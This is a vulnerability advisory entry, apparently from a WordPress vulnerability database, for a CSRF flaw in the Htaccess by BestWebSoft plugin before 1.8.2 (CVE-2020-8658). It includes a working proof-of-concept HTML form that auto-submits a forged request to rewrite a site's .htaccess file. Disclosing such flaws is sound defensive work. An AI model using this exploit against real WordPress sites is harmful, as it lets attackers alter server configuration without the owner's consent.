Lucene search
WpvulndbWPEX-ID:77165939-B599-47D0-877B-A739A8E0FC49HistoryFeb 01, 2020 - 12:00 a.m.
Htaccess by BestWebSoft < 1.8.2 - CSRF to edit .htaccess
2020-02-0100:00:00
wpvulndb
13
0.003 Low
EPSS
Percentile
71.5%
The Htaccess by BestWebSoft WordPress plugin was affected by a CSRF to edit .htaccess security vulnerability.
<html>
<body onload="document.forms[0].submit();">
<form action="https://[WP]/wp-admin/admin.php?page=htaccess.php&action=htaccess_editor" method="POST">
<input type="hidden" name="htccss_customise" value="# Modified by CSRF" />
<input type="hidden" name="htccss_form_custom" value="submit" />
<input type="hidden" name="htccss_submit_button_custom" value="Save+Changes" />
<input type="hidden" name="htccss_nonce_name" value="attacker" />
<input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=htaccess.php&action=htaccess_editor" />
</form>
</body>
</html>
Related
nvd
nvd
CVE-2020-8658
2020-02-06 03:15:10
cvelist
cvelist
CVE-2020-8658
2020-02-06 02:19:25
wpvulndb
wpvulndb
Htaccess by BestWebSoft < 1.8.2 - CSRF to edit .htaccess
2020-02-01 00:00:00
prion
prion
Cross site request forgery (csrf)
2020-02-06 03:15:00
cve
cve
CVE-2020-8658
2020-02-06 03:15:10